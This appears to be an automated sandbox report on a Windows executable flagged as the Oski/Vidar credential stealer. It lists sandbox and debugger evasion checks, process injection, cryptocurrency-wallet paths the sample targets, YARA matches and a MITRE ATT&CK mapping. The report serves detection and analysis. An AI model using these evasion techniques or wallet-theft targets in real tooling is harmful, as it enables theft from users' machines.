Static PE information: real checksum: 0x13f018 should be: 0x14b34b

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_0040ADF5 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z,__EH_prolog3,__wgetenv,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_0040ADF5

Source: C:\Users\user\Desktop\555.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\555.exe

Event Logs and Signature results: Application crash and keyboard check

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_004164C4 GetSystemTime followed by cmp: cmp eax, 04h and CTI: jc 00416512h

3_2_004164C4

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_00450D1B GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00450E46h

3_2_00450D1B

Source: C:\Users\user\Desktop\555.exe

Window / User API: foregroundWindowGot 453

Jump to behavior

Source: C:\Users\user\Desktop\555.exe

Evaded block: after key decision

graph_3-65467

Source: C:\Users\user\Desktop\555.exe

API coverage: 9.9 %

Source: C:\Users\user\Desktop\555.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_004274F9 GetSystemInfo,

3_2_004274F9

Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00411CE4 __EH_prolog3_catch_GS,__wgetenv,FindFirstFileW,	3_2_00411CE4
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00404BD7 __EH_prolog3,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcatW,FindNextFileW,FindClose,	3_2_00404BD7
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0040F1C4 __EH_prolog3_GS,__wgetenv,FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	3_2_0040F1C4
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00405291 __EH_prolog3,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,	3_2_00405291
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00453605 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,	3_2_00453605
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0040F72A __EH_prolog3_GS,__wgetenv,FindFirstFileW,GetFileAttributesW,FindNextFileW,	3_2_0040F72A

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_00405742 _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,

3_2_00405742

Source: C:\Users\user\Desktop\555.exe	API call chain: ExitProcess graph end node	graph_0-41025
Source: C:\Users\user\Desktop\555.exe	API call chain: ExitProcess graph end node	graph_0-41038
Source: C:\Users\user\Desktop\555.exe	API call chain: ExitProcess graph end node	graph_0-40200
Source: C:\Users\user\Desktop\555.exe	API call chain: ExitProcess graph end node	graph_0-39473
Source: C:\Users\user\Desktop\555.exe	API call chain: ExitProcess graph end node	graph_0-40208
Source: C:\Users\user\Desktop\555.exe	API call chain: ExitProcess graph end node	graph_3-65038
Source: C:\Users\user\Desktop\555.exe	API call chain: ExitProcess graph end node	graph_3-66171

Source: 555.exe, 00000003.00000002.317520983.00000000007E7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3

Source: C:\Users\user\Desktop\555.exe

Code function: 0_2_004230EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_004230EF

Source: C:\Users\user\Desktop\555.exe

0_2_00408B20

Source: C:\Users\user\Desktop\555.exe

Code function: 0_2_00439101 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_00439101

Source: C:\Users\user\Desktop\555.exe

Code function: 0_2_04771560 mov eax, dword ptr fs:[00000030h]

0_2_04771560

Source: C:\Users\user\Desktop\555.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\555.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_004230EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004230EF
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_004287EA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004287EA
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_0042CF16 SetUnhandledExceptionFilter,	0_2_0042CF16
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00458B31 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00458B31
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00466FD1 SetUnhandledExceptionFilter,	3_2_00466FD1
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0045F80E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0045F80E

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\555.exe

Memory written: C:\Users\user\Desktop\555.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\555.exe

Process created: C:\Users\user\Desktop\555.exe C:\Users\user\Desktop\555.exe

Jump to behavior

Source: C:\Users\user\Desktop\555.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_0042F0DC
Source: C:\Users\user\Desktop\555.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_00425096
Source: C:\Users\user\Desktop\555.exe	Code function: ____lc_handle_func,GetLocaleInfoW,	0_2_0044C0A2
Source: C:\Users\user\Desktop\555.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_0042F1DE
Source: C:\Users\user\Desktop\555.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_0042F183
Source: C:\Users\user\Desktop\555.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_0042F3AF
Source: C:\Users\user\Desktop\555.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_0042F46F
Source: C:\Users\user\Desktop\555.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_0043540E
Source: C:\Users\user\Desktop\555.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_0042F4D6
Source: C:\Users\user\Desktop\555.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_004354E8
Source: C:\Users\user\Desktop\555.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_0042F512
Source: C:\Users\user\Desktop\555.exe	Code function: GetLocaleInfoA,	0_2_004276B6
Source: C:\Users\user\Desktop\555.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_0042E815
Source: C:\Users\user\Desktop\555.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_0042D8E3
Source: C:\Users\user\Desktop\555.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_0042EB03
Source: C:\Users\user\Desktop\555.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_0042DBB9
Source: C:\Users\user\Desktop\555.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0042EFE7
Source: C:\Users\user\Desktop\555.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_0046869A
Source: C:\Users\user\Desktop\555.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0045C90A
Source: C:\Users\user\Desktop\555.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00468988
Source: C:\Users\user\Desktop\555.exe	Code function: __EH_prolog3,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memset,LocalFree,	3_2_00450D1B
Source: C:\Users\user\Desktop\555.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00468E6C
Source: C:\Users\user\Desktop\555.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_00468F61
Source: C:\Users\user\Desktop\555.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_00469063
Source: C:\Users\user\Desktop\555.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_00469008
Source: C:\Users\user\Desktop\555.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_00469234
Source: C:\Users\user\Desktop\555.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_004692F4
Source: C:\Users\user\Desktop\555.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0046935B
Source: C:\Users\user\Desktop\555.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_00469397
Source: C:\Users\user\Desktop\555.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_00467793
Source: C:\Users\user\Desktop\555.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_0046DA57
Source: C:\Users\user\Desktop\555.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_00467A3E
Source: C:\Users\user\Desktop\555.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_0046DB31
Source: C:\Users\user\Desktop\555.exe	Code function: GetLocaleInfoA,	3_2_00459E8F

Source: C:\Users\user\Desktop\555.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\555.exe

0_2_00408B20

Source: C:\Users\user\Desktop\555.exe

Code function: 0_2_0044D58B __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_0044D58B

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_0040A13F _memset,GetVersionExA,

3_2_0040A13F

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_00450776 GetUserNameA,

3_2_00450776

Stealing of Sensitive Information

Yara detected Oski Stealer

Source: Yara match	File source: 3.0.555.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.555.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.292388271.00000000048A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.296551776.0000000000474000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.292903464.0000000004B5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 555.exe PID: 6192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 555.exe PID: 6444, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 3.0.555.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.555.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.292388271.00000000048A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.296551776.0000000000474000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.292903464.0000000004B5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 555.exe PID: 6192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 555.exe PID: 6444, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: file__0.localstorage
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: default_wallet
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \MultiDoge\
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Source: Yara match

File source: Process Memory Space: 555.exe PID: 6444, type: MEMORYSTR

Remote Access Functionality

Yara detected Oski Stealer

Source: Yara match	File source: 3.0.555.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.555.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.292388271.00000000048A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.296551776.0000000000474000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.292903464.0000000004B5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 555.exe PID: 6192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 555.exe PID: 6444, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 3.0.555.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.555.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.292388271.00000000048A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.296551776.0000000000474000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.292903464.0000000004B5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 555.exe PID: 6192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 555.exe PID: 6444, type: MEMORYSTR

Source: C:\Users\user\Desktop\555.exe

Code function: 0_2_00408870 CoInitialize,CreateBindCtx,MkParseDisplayName,

0_2_00408870

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	111 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Network Share Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	111 Process Injection	LSASS Memory	12 System Time Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
